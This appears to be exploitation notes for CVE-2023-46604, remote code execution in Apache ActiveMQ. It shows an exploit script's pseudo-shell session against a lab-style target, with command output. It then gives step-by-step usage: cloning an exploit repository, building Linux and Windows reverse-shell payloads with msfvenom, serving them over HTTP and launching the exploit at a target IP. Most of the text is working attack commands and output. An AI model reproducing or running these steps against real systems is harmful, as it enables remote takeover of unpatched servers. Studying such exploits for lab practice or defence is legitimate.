RCE CVE-2023-46604

$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: <http://10.10.14.59:8080/poc.xml>
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$

exploit.py

poc.xml

Reverse Shell

This exploit builds on the original work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We extended that technique to obtain a reverse shell using a payload generated with the Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Usage:

Important: Manually change the IP address (0.0.0.0 on line 11) in the XML files to the IP address of the host where the payload is generated and served. If you follow the commands below, that is your listener IP address. {IP_Of_Hosted_XML_File} is also your listener IP address.

For Linux/Unix Targets

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell

cd CVE-2023-46604-RCE-Reverse-Shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf

python3 -m http.server 8001

./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

For Windows Targets

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell

cd CVE-2023-46604-RCE-Reverse-Shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f exe -o test.exe

python3 -m http.server 8001

./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml